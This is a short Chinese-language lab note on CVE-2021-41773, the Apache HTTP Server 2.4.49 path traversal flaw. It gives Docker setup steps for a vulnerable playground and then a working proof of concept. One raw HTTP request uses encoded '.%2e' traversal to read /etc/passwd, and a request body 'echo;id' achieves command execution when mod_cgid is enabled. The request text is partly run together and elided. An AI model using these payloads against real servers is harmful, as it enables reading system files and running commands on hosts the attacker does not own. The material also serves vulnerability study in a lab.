存在漏洞的版本:仅影响Apache HTTP Server 2.4.49版本
推荐环境:GitHub - blasty/CVE-2021-41773: CVE-2021-41773 playground
下载后:
docker-compose build && docker-compose up
如果遇到:
则进入容器,修改
vim /etc/apache2/apache2.conf
最后一行加入:
ServerName localhost:80
修改后重启:
apachectl restart
Poc:
GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1 Host: xx.xx.xx.xx:8080 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,** Content-Length: 7 Content-Type: application/x-www-form-urlencoded Connection: close echo;id
注意:这里需要开启mod_cgid
ls /etc/apache2/mods-available/ |grep cgi
参考:CVE-2021-41773升华篇-Apache HTTP Server 路径穿越漏洞提升至RCE回显深入分析
